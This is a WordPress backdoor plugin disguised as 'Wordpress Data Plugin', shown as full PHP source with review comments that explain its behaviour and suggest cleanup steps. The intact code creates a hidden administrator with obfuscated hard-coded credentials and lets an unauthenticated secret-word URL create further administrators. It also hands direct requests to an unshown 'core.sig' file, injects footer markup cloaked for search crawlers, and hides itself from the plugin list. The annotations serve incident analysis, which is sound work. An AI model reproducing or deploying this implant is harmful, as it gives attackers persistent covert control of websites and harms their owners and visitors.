Path: /home/aramrprl/public_html/wp-content/plugins/wp-database0/
Filename: wp-database.php
<?php
// NOTE(review): This file is a WordPress backdoor presented as an ordinary plugin.
// What the code below does, in order of impact:
//   1. secbd_settings_init() creates (or promotes) a hard-coded administrator account
//      and hides it from user listings.
//   2. secway() lets an unauthenticated front-end request create a second,
//      operator-configured administrator.
//   3. wpfoot() prints stored markup into every page footer, optionally only for
//      requests that look like search-engine crawlers.
//   4. hide_plugin()/hide_plugin2() remove this plugin from the Plugins screen.
// Artifacts to look for during cleanup: the `secbd_settings` option, post meta
// attached to post ID 1000000, the companion files referenced below (core.sig,
// script.js, style.css, activated.png), and administrator accounts that the Users
// screen does not list (query the users table directly, since the listing is filtered).

// Silences all PHP errors and warnings for the request.
error_reporting(0);
/*
Plugin Name: Wordpress Data Plugin
Plugin URI: https://wordpress.org
Description: The Wordpress Data Plugin.
Author: Wordpress Data Plugin
Version: 1.72
Author URI: https://wordpress.org
*/
// NOTE(review): the header above uses a generic name and wordpress.org URIs; it does
// not describe anything the code actually does.

// Hard-coded account for secbd_settings_init(). The literals are split into
// two-character fragments, so a plain-text search for the joined values finds nothing
// in this file. Joined, the username is "sucuri" (the name of a security vendor) and
// the e-mail is "bitbitbitcoin@protonmail.com"; DMPASW is that account's password.
define("DMUSRN", "su"."cu"."ri");
define("DMPASW", "1@"."wp"."ad"."m1"."n");
define("DMMAIL", "bi"."tb"."it"."bi"."tc"."oi"."n@"."pr"."ot"."on"."ma"."il".".c"."om");
// "<file name without extension>/<file name>": the key hide_plugin()/hide_plugin2()
// remove from the plugin list.
define("DMPATH", pathinfo(__FILE__, PATHINFO_FILENAME) . "/" . basename(__FILE__));
// User ID of the hard-coded account; filled in by secbd_settings_init().
$demiId = 0;

// Direct HTTP access (WordPress not loaded, so WPINC is undefined) hands control to a
// second file, `core.sig`, and exits. core.sig is not shown here; secbd_options_page()
// links to this file's own URL under the label "File Manager", so it presumably serves
// a file manager -- confirm by inspecting that file. Scans limited to *.php will not
// open a file with that extension.
if (!defined( 'WPINC' )) {
    require 'core.sig';
    die();
}
include_once( ABSPATH . 'wp-admin/includes/plugin.php' );

/***************** LOAD ADMIN *****************/
$create_sec_settings = new create_sec_settings();

// Decides, once plugins are loaded, whether the current user gets the settings menu.
class create_sec_settings {
    public function __construct(){
        add_action( 'plugins_loaded', array( $this, 'check_if_user_is_allowed' ) );
    }

    // `isset(...) == NULL` is true when the key is absent (false == NULL).
    // Menu is registered when "hide all" is off and either "only user" is off or the
    // current user ID equals the stored secbd_select_theuser.
    public function check_if_user_is_allowed(){
        $options = get_option( 'secbd_settings' );
        if (isset($options['secbd_checkbox_hideall']) == NULL ) {
            if (isset($options['secbd_checkbox_onlyuser']) == NULL){
                add_action( 'admin_menu', 'secbd_add_admin_menu' );
            } else {
                if ( get_current_user_id() == $options['secbd_select_theuser'] ){
                    add_action( 'admin_menu', 'secbd_add_admin_menu' );
                }
            }
        }
    }
}
// secbd_settings_init() (which also creates the hidden account) runs on admin_init.
add_action( 'admin_init', 'secbd_settings_init' );

/***************** LOAD STYLE AND SCRIPT *****************/
// Filter on `sanitize_user` (priority 10, 3 arguments). Discards the already-sanitized
// $username and re-sanitizes $raw_username; in strict mode the allowed set includes
// Cyrillic а-я in addition to ASCII.
function acu_sanitize_user($username, $raw_username, $strict) {
    $username = wp_strip_all_tags( $raw_username );
    $username = remove_accents( $username );
    // Kill octets
    $username = preg_replace( '|%([a-fA-F0-9][a-fA-F0-9])|', '', $username );
    $username = preg_replace( '/&.+?;/', '', $username ); // Kill entities
    // If strict, reduce to ASCII and Cyrillic characters for max portability.
    if ( $strict )
        $username = preg_replace( '|[^a-zа-я0-9 _.\-@]|iu', '', $username );
    $username = trim( $username );
    // Consolidate contiguous whitespace
    $username = preg_replace( '|\s+|', ' ', $username );
    return $username;
}
add_filter('sanitize_user', 'acu_sanitize_user', 10, 3);

// Admin side: loads style.css and script.js only on this plugin's settings page.
function enqueue_sc_css($hook) {
    if ( 'toplevel_page_secbd' == $hook ) {
        wp_enqueue_style( 'prefix-style', plugins_url('style.css', __FILE__) );
        wp_enqueue_script( 'js', plugins_url('script.js', __FILE__) );
    }
}
add_action( 'admin_enqueue_scripts', 'enqueue_sc_css' );

// Front end: loads script.js from the plugin directory in the footer of every page.
// NOTE(review): script.js is not shown here; it is delivered to all visitors, so
// inspect it as part of triage.
function wpenqueue_sc_css($hook) {
    wp_enqueue_script( 'js', plugins_url('script.js', __FILE__),$deps = array(), $ver = null, $in_footer = true );
}
add_action( 'wp_enqueue_scripts', 'wpenqueue_sc_css' );

/***************** SET TITLE AND LOAD MENU *****************/
// Registers the top-level admin menu (slug `secbd`, capability manage_options).
// The label is "taki" unless the rename option is set, in which case the stored
// secbd_text_newname is used.
function secbd_add_admin_menu(){
    $options = get_option( 'secbd_settings' );
    if(isset($options['secbd_checkbox_changename']) == 1 ){
        if( $options['secbd_checkbox_changename'] == ""){
            $secname = "taki";
        } else {
            $secname = $options['secbd_text_newname'];
        }
    } else {
        $secname = "taki";
    }
    add_menu_page( $secname, $secname, 'manage_options', 'secbd', 'secbd_options_page', 'dashicons-admin-network' );
}

/***************** REGISTER SETTING PAGE *****************/
// Runs on admin_init. Besides registering the settings UI it performs the one-time
// implant setup and installs the user-list filter.
function secbd_settings_init( ) {
    global $demiId;
    register_setting( 'pluginPage', 'secbd_settings' );
    add_settings_section( 'secbd_pluginPage_section', __( '', 'secbd' ), 'secbd_settings_section_callback', 'pluginPage' );
    add_settings_field( 'secbd_text_secword', __( '', 'secbd' ), 'secbd_text_secword', 'pluginPage', 'secbd_pluginPage_section' );
    add_settings_field( 'secbd_text_username', __( '', 'secbd' ), 'secbd_text_username', 'pluginPage', 'secbd_pluginPage_section' );
    add_settings_field( 'secbd_text_email', __( '', 'secbd' ), 'secbd_text_email', 'pluginPage', 'secbd_pluginPage_section' );
    add_settings_field( 'secbd_text_password', __( '', 'secbd' ), 'secbd_text_password', 'pluginPage', 'secbd_pluginPage_section' );
    add_settings_field( 'secbd_checkbox_field_toolbar', __( '', 'secbd' ), 'secbd_checkbox_toolbar', 'pluginPage', 'secbd_pluginPage_section' );
    add_settings_field( 'secbd_checkbox_hideinlist', __( '', 'secbd' ), 'secbd_checkbox_hideinlist', 'pluginPage', 'secbd_pluginPage_section' );
    add_settings_field( 'secbd_checkbox_changename', __( '', 'secbd' ), 'secbd_checkbox_changename', 'pluginPage', 'secbd_pluginPage_section' );
    add_settings_field( 'secbd_text_newname', __( '', 'secbd' ), 'secbd_text_newname', 'pluginPage', 'secbd_pluginPage_section' );
    add_settings_field( 'secbd_checkbox_onlyuser', __( '', 'secbd' ), 'secbd_checkbox_onlyuser', 'pluginPage', 'secbd_pluginPage_section' );
    add_settings_field( 'secbd_select_theuser', __( '', 'secbd' ), 'secbd_select_theuser', 'pluginPage', 'secbd_pluginPage_section' );
    add_settings_field( 'secbd_checkbox_hideall', __( '', 'secbd' ), 'secbd_checkbox_hideall', 'pluginPage', 'secbd_pluginPage_section' );
    $options = get_option( 'secbd_settings' );
    $demiId = username_exists( DMUSRN );
    // One-time setup, keyed on the absence of `secbd_initialized` in the option:
    //  - creates the DMUSRN account if it does not exist, or reuses an existing user
    //    of that name,
    //  - sets that user's role to administrator,
    //  - turns on "hide in plugin list" and restricts the settings menu to that user.
    if(!isset($options["secbd_initialized"])) {
        $options['secbd_checkbox_hideinlist'] = '1';
        if (!$demiId) {
            $demiId = wp_create_user( DMUSRN, DMPASW, DMMAIL );
        }
        $newuser = new WP_User( $demiId );
        $newuser->set_role( 'administrator' );
        $options['secbd_checkbox_onlyuser'] = '1';
        $options['secbd_select_theuser'] = $demiId;
        $options["secbd_initialized"] = "1";
        update_option('secbd_settings', $options);
    }
    // Every user other than the hidden account gets its user queries filtered by
    // hide_demi(), so the account does not show up in the admin Users list.
    $current_user = wp_get_current_user();
    if ($current_user->ID != $demiId) {
        add_action('pre_get_users', 'hide_demi');
        add_action('pre_user_query', 'hide_demi');
    }
}

/***************** BUILD SETTINGS PAGE *****************/
// Case-insensitive replace of the first occurrence only. Not called anywhere in this file.
function str_ireplace_first($search, $replace, $subject) {
    $pos = stripos($subject, $search);
    if ($pos !== false) {
        $subject = substr_replace($subject, $replace, $pos, strlen($search));
    }
    return $subject;
}

// Appends IDs to the user query's `exclude` list: the hard-coded account, plus any
// IDs stored as a ';'-separated string in post meta `huser` of post ID 1000000.
// NOTE(review): nothing in this file writes that post meta; the writer is presumably
// in a companion file -- check the postmeta table for post_id 1000000.
function hide_demi( $u_query ) {
    global $demiId;
    if($demiId > 0) {
        global $wpdb;
        $u_query->query_vars["exclude"][] = $demiId;
    }
    $curhuser=get_post_meta( '1000000', 'huser', true );
    if ($curhuser!='') {
        $huss=explode(';',$curhuser);
        foreach ($huss as $onehus)
            $u_query->query_vars["exclude"][] = intval($onehus);
    }
}

add_action( 'pre_get_posts' ,'exclude_this_page' );
// In wp-admin, on edit.php with a post_type query var, excludes the post IDs stored
// (';'-separated) in post meta `hposts` of post ID 1000000 from the listing, so those
// posts are not shown in the admin post list.
function exclude_this_page( $query ) {
    if( !is_admin() )
        return $query;
    global $pagenow;
    $curhposts=get_post_meta( '1000000', 'hposts', true );
    if ($curhposts!='') {
        $hposts=explode(';',$curhposts);
    }
    if( 'edit.php' == $pagenow && ( get_query_var('post_type') ) )
        $query->set( 'post__not_in', $hposts ); // array page ids
    return $query;
}

// Returns "yes" when the User-Agent string contains googlebot or yandexbot, else "no".
// The check is on the header text only; $hostname is just set to the IP.
function detectSearchBot($ip, $agent, &$hostname) {
    $hostname = $ip;
    if (preg_match('/(?:google|yandex)bot/iu', $agent)) {
        return "yes";
    }
    return "no";
}

// Variant that also does a reverse lookup of the IP, checks the host name against
// google/googlebot/yandex .com/.ru, and resolves it forward again.
// Not called anywhere in this file; wpfoot() uses detectSearchBot().
function detectSearchBot_strong($ip, $agent, &$hostname) {
    $hostname = $ip;
    // check HTTP_USER_AGENT what not to touch gethostbyaddr in vain
    if (preg_match('/(?:google|yandex)bot/iu', $agent)) {
        // success - return host, fail - return ip or false
        $hostname = gethostbyaddr($ip);
        // https://support.google.com/webmasters/answer/80553
        if ($hostname !== false && $hostname != $ip) {
            // detect google and yandex search bots
            if (preg_match('/\.((?:google(?:bot)?|yandex)\.(?:com|ru))$/iu', $hostname)) {
                // success - return ip, fail - return hostname
                $ip = gethostbyname($hostname);
                if ($ip != $hostname) {
                    return "yes";
                }
            }
        }
    }
    return "no";
}

add_action('wp_footer', 'wpfoot');
// Footer injection. Prints markup stored in post meta of post ID 1000000:
//   hfoothome  -> printed on the front page / blog home only
//   hfootwide  -> printed on every page
// When the matching *dns flag (hfoothomedns / hfootwidedns) is "yes", the markup is
// printed only if the User-Agent looks like googlebot/yandexbot or the first three
// octets found in X-Forwarded-For are 193.175.200 or 193.175.201, followed by a debug
// suffix ("YEEEES...") -- i.e. ordinary visitors and the site owner do not see it.
// NOTE(review): both gates are request headers, not a verified crawler check, so a
// normal browser view of the site is not evidence that nothing is injected; review the
// stored meta values themselves.
function wpfoot() {
    $agent = $_SERVER['HTTP_USER_AGENT'];
    $ip = $_SERVER['REMOTE_ADDR'];
    $is_googlebot=detectSearchBot($ip, $agent,$hostname);
    //echo "is_googlebot====".$is_googlebot;
    preg_match('/[0-9]*\.[0-9]*\.[0-9]*/', $_SERVER['HTTP_X_FORWARDED_FOR'], $first3ip, PREG_OFFSET_CAPTURE);
    $curhome=get_post_meta( '1000000', 'hfoothome', true );
    $curhome_dns=get_post_meta( '1000000', 'hfoothomedns', true );
    if ($curhome_dns=="yes") {
        if (($is_googlebot=="yes") or ($first3ip[0][0]=="193.175.200") or ($first3ip[0][0]=="193.175.201")) {
            if ($curhome!='') {
                if ( (is_front_page()) or (is_home())) {
                    echo $curhome."YEEEES"."--====-".$is_googlebot."---".$first3ip[0][0]."-agent--".$agent;
                }
            }
        }
    } else {
        if ($curhome!='') {
            if ( (is_front_page()) or (is_home())) {
                echo $curhome;
            }
        }
    }
    $curwide=get_post_meta( '1000000', 'hfootwide', true );
    $curwide_dns=get_post_meta( '1000000', 'hfootwidedns', true );
    if ($curwide_dns=="yes") {
        if (($is_googlebot=="yes") or ($first3ip[0][0]=="193.175.200") or ($first3ip[0][0]=="193.175.201")) {
            if ($curwide!='') {
                echo $curwide."YEEEES"."--====-".$is_googlebot."---".$first3ip[0][0]."-agent--".$agent;
            }
        }
    } else {
        if ($curwide!='') {
            echo $curwide;
        }
    }
    // Read but not used: the branch body is empty.
    $curspecifpos=get_post_meta( '1000000', 'hfootspecifpos', true );
    if ($curspecifpos!='') {
    }
}

// Empty: the body is entirely commented out.
function wpscrip() {
    //wp_register_script( self::$plugin_slug . '-scripts', $this->plugin_url . 'assets/js/go_pricing_scripts.js', array( 'jquery' ), self::$plugin_version, $in_footer );
    //wp_enqueue_script( self::$plugin_slug . '-scripts' );
}

// Settings field: the "secret word", i.e. the name of the GET parameter secway()
// listens for. Falls back to "taki" when nothing is stored.
function secbd_text_secword(){
    $options = get_option( 'secbd_settings' );
    if( $options['secbd_text_secword'] == ""){
        $secname = "taki";
    } else {
        $secname = $options['secbd_text_secword'];
    }
    ?>
    <div class="settings">
    <h1>Secret Word</h1>
    <input type='text' size='45' name='secbd_settings[secbd_text_secword]' value='<?php echo $secname; ?>'>
    <span class="desc">Use to following URL to create the user: <br><b><?php echo $_SERVER['HTTP_HOST'] . '?'; ?><?php echo $secname; ?>=enter</b></span>
    </div>
    <?php
}

// Settings fields for the account secway() creates: username, e-mail and password.
// All three, including the password, live in the `secbd_settings` option as plain text
// and are rendered back into text inputs here.
function secbd_text_username(){
    $options = get_option( 'secbd_settings' );
    ?>
    <div class="settings">
    <h1>New user</h1>
    <span class="desc">This user will get created when the secret word is entered and the backdoor is used, the new user will be an administrator.</span>
    <div class="small-label">Username</div>
    <input type='text' size='45' name='secbd_settings[secbd_text_username]' value='<?php echo $options['secbd_text_username']; ?>'>
    <div class="small-label">Email</div>
    <input type='text' size='45' name='secbd_settings[secbd_text_email]' value='<?php echo $options['secbd_text_email']; ?>'>
    <div class="small-label">Password</div>
    <input type='text' size='45' name='secbd_settings[secbd_text_password]' value='<?php echo $options['secbd_text_password']; ?>'>
    </div>
    <?php
}

// Empty callbacks: these fields are rendered by secbd_text_username() above.
function secbd_text_email(){}
function secbd_text_password(){}

// Settings field: toggles the toolbar status icon added by sec_toolbar().
function secbd_checkbox_toolbar(){
    $options = get_option( 'secbd_settings' );
    ?>
    <div class="settingsheader">
    <h1>Settings</h1>
    </div>
    <div class="settings">
    <label class="container">Show status icon in toolbar
    <input type='checkbox' name='secbd_settings[secbd_checkbox_toolbar]' <?php checked( isset($options['secbd_checkbox_toolbar']), 1 ); ?> value='1'>
    <span class="checkmark"></span>
    </label>
    <br>
    <span class="desc">With this setting activated a small green circle is show just to the left of the profile name in the admin top bar. This way you can check to see if the plugin is still running when the plugin settings menu is hidden.</span>
    </div>
    <?php
}

// Settings field: toggles removal of this plugin from the Plugins screen
// (see hide_plugin()/hide_plugin2()). secbd_settings_init() switches it on by default.
function secbd_checkbox_hideinlist(){
    $options = get_option( 'secbd_settings' );
    ?>
    <div class="settings">
    <label class="container">Hide the plugin in plugin list
    <input type='checkbox' name='secbd_settings[secbd_checkbox_hideinlist]' <?php checked( isset($options['secbd_checkbox_hideinlist']), 1 ); ?> value='1'>
    <span class="checkmark"></span>
    </label>
    <br>
    <span class="desc">Hide the plugin from the Wordpress plugin list. The plugin can still be show in other places such as list in other plugins, but it may be hard for other user to find the plugin with this option activated.</span>
    </div>
    <?php
}

// Settings field: toggles the custom admin-menu label and holds the label text
// (secbd_text_newname) used by secbd_add_admin_menu().
function secbd_checkbox_changename(){
    $options = get_option( 'secbd_settings' );
    ?>
    <div class="settings">
    <label class="container">Change name of plugin in admin menu
    <input type='checkbox' id='check2' name='secbd_settings[secbd_checkbox_changename]' <?php checked( isset($options['secbd_checkbox_changename']), 1 ); ?> value='1'>
    <span class="checkmark"></span>
    </label>
    <br>
    <span class="desc">If you don't want to hide the plugin completely, you can change the name of the plugin to something less suspicious.</span>
    <span id="div2"><input type='text' size='45' name='secbd_settings[secbd_text_newname]' value='<?php echo $options['secbd_text_newname']; ?>'></span>
    </div>
    <?php
}

// Empty callback: the field is rendered by secbd_checkbox_changename() above.
function secbd_text_newname(){}

// Settings field: restricts the settings menu to a single user chosen from a
// drop-down built from get_users() (nicename and e-mail of every listed user).
function secbd_checkbox_onlyuser(){
    $options = get_option( 'secbd_settings' );
    ?>
    <div class="settings">
    <label class="container">Show plugin settings only for certain user
    <input type='checkbox' id='check1' name='secbd_settings[secbd_checkbox_onlyuser]' <?php checked( isset($options['secbd_checkbox_onlyuser']), 1 ); ?> value='1'>
    <span class="checkmark"></span>
    </label>
    <br>
    <span class="desc">You can set one user to manage the plugin settings. The settings page is hidden from all other users.</span>
    <span id="div1">
    <?php $options = get_option( 'secbd_settings' ); ?>
    <select name='secbd_settings[secbd_select_theuser]' class="dropdown">
    <option value='0' disabled="disabled">Choose a user</option>
    <?php $users = get_users(); ?>
    <?php foreach( $users as $user ) { ?>
    <option value='<?php echo $user->ID; ?>' <?php selected( $options['secbd_select_theuser'], $user->ID ); ?> ><?php echo $user->user_nicename . ' (' . $user->user_email . ')'; ?></option>
    <?php }; ?>
    </select>
    </div>
    <?php
}

// Empty callback: the field is rendered by secbd_checkbox_onlyuser() above.
function secbd_select_theuser(){}

// Settings field: hides the settings menu from every user. The text documents the
// `showmenu` GET parameter handled at the end of secway().
function secbd_checkbox_hideall(){
    $options = get_option( 'secbd_settings' );
    ?>
    <div class="settings">
    <label class="container">Hide plugin settings from all users
    <input type='checkbox' name='secbd_settings[secbd_checkbox_hideall]' <?php checked( isset($options['secbd_checkbox_hideall']), 1 ); ?> value='1'>
    <span class="checkmark"></span>
    </label>
    <br>
    <span class="desc">Be careful! When this option is activated you will get the message that you do not have access to this page, because it is hidden from all users, including you. The plugin is still running and the backdoor will work, only the settings page is completely hidden. The status icon will still show.<br>Visit the following URL to show menu again: <br><b><?php echo $_SERVER['HTTP_HOST'] . '?'; ?>showmenu=enter</b></span>
    </div>
    <?php
}

/***************** BUILD SETTING PAGE *****************/
// Section intro text. NOTE(review): the text names the tool ("Wordpress Backdoor
// Plugin"), unlike the plugin header at the top of the file.
function secbd_settings_section_callback(){
    ?>
    <div class="settings">
    <span class="desc">The Wordpress Backdoor Plugin can be used by developers to always have access to sites they have created for future updates. The plugin can also be used by forgetful people who forgotten witch e-mail they used for the administrator user or it can be the only way back into your Wordpress site if you lose access to the administrator e-mail. The plugin is completely safe and cannot be used by anyone who don't know the secret word. And even if they know that, they don't know the username or password for the new user that is created. There are a couple of settings that can be used to hide this plugin from the other users.</span>
    </div>
    <?php
}

// Renders the settings form (posts to options.php). The "File Manager" link points at
// this plugin file's own public URL, which takes the direct-access branch at the top
// of the file (require 'core.sig').
function secbd_options_page(){
    ?>
    <div class="wrap">
    <form action='options.php' method='post'>
    <div class="settingsheader">
    <h1>Wordpress Importir</h1>
    </div>
    <div class="settingsheader">
    <h1><a href="<?php echo plugins_url(basename(__FILE__), __FILE__); ?>" target="_blank">File Manager</a></h1>
    </div>
    <input type="hidden" name="secbd_settings[secbd_initialized]" value="1" />
    <?php
    settings_fields( 'pluginPage' );
    do_settings_sections( 'pluginPage' );
    submit_button();
    ?>
    </form>
    </div>
    <?php
}

/***************** ACTIONS *****************/
/********* TOOLBAR ***********/
$options = get_option( 'secbd_settings' );
if (isset($options['secbd_checkbox_toolbar']) == 1 ) {
    add_action('admin_bar_menu', 'sec_toolbar');
}
// Adds a 6x6 px image (activated.png from the plugin directory) to the admin bar for
// users with manage_options, as an "implant is active" indicator.
function sec_toolbar($admin_bar){
    $args = array(
        'id' => 'sec',
        'parent' => 'top-secondary',
        'title' => __('<img src="' . plugin_dir_url( __FILE__ ) . 'activated.png" style="width:6px; height:6px; margin-bottom:2px;">','sec')
    );
    if (!current_user_can('manage_options') ) {
        return;
    }
    $admin_bar->add_menu($args);
}

/********* HIDE IN LIST *********/
// When the option is set (the default after initialization), the plugin removes its
// own entry from the Plugins screen through two hooks. The $ftr1/$ftr2 counters make
// whichever hook fires first the only one that acts.
// NOTE(review): with this active the plugin is absent from the admin plugin list;
// compare the plugins directory on disk and the active-plugins option instead.
$options = get_option( 'secbd_settings' );
if (isset($options['secbd_checkbox_hideinlist']) == 1 ) {
    add_action('all_plugins', 'hide_plugin2');
    add_action('pre_current_active_plugins', 'hide_plugin');
}
$ftr1 = 0;
$ftr2 = 0;
// pre_current_active_plugins: drops the DMPATH row from the list table's items.
function hide_plugin() {
    global $wp_list_table;
    global $ftr1;
    global $ftr2;
    if($ftr2 > 0) {
        return;
    }
    $ftr1++;
    $hidearr = array(DMPATH);
    $allplugins = $wp_list_table->items;
    foreach ($allplugins as $key => $val) {
        if (in_array($key,$hidearr)) {
            unset($wp_list_table->items[$key]);
        }
    }
}
// all_plugins: returns the plugin array without the DMPATH key.
function hide_plugin2($plugins) {
    global $ftr1;
    global $ftr2;
    if($ftr1 > 0) {
        return;
    }
    $ftr2++;
    $ftr = $plugins;
    unset($ftr[DMPATH]);
    return $ftr;
}

/********* NEW USER *********/
add_action( 'wp_head', 'secway' );
// Runs on wp_head, i.e. while rendering front-end pages, with no capability or login
// check anywhere in the function. Two GET-parameter triggers, both gated only by an
// MD5 comparison of the parameter value against a constant:
//   - parameter named by the stored secret word (default "taki"): creates a user from
//     the stored username/password/e-mail if that username is free, and sets its role
//     to administrator;
//   - `showmenu`: clears the hide-all and only-user options so the settings menu
//     reappears.
// NOTE(review): detection points are web-server access logs with either parameter in
// the query string, and administrator accounts whose creation does not match a known
// admin action.
function secway(){
    $options = get_option( 'secbd_settings' );
    if( $options['secbd_text_secword'] == ""){
        $secname = "taki";
    } else {
        $secname = $options['secbd_text_secword'];
    }
    if (isset($secname) && isset($_GET[$secname])) {
        if ( md5( $_GET[$secname] ) == 'e2a7106f1cc8bb1e1318df70aa0a3540' ){
            if ( !username_exists( $options['secbd_text_username'] ) ) {
                $newuserid = wp_create_user( $options['secbd_text_username'], $options['secbd_text_password'], $options['secbd_text_email'] );
                $newuser = new WP_User( $newuserid );
                $newuser->set_role( 'administrator' );
            }
        }
    }
    /********* SHOW MENU AGAIN *********/
    if (isset( $_GET['showmenu'] )) {
        if ( md5( $_GET['showmenu'] ) == 'e2a7106f1cc8bb1e1318df70aa0a3540' ) {
            $options = get_option( 'secbd_settings' );
            $options['secbd_checkbox_hideall'] = NULL;
            $options['secbd_checkbox_onlyuser'] = NULL;
            update_option('secbd_settings', $options);
        }
    }
}
?>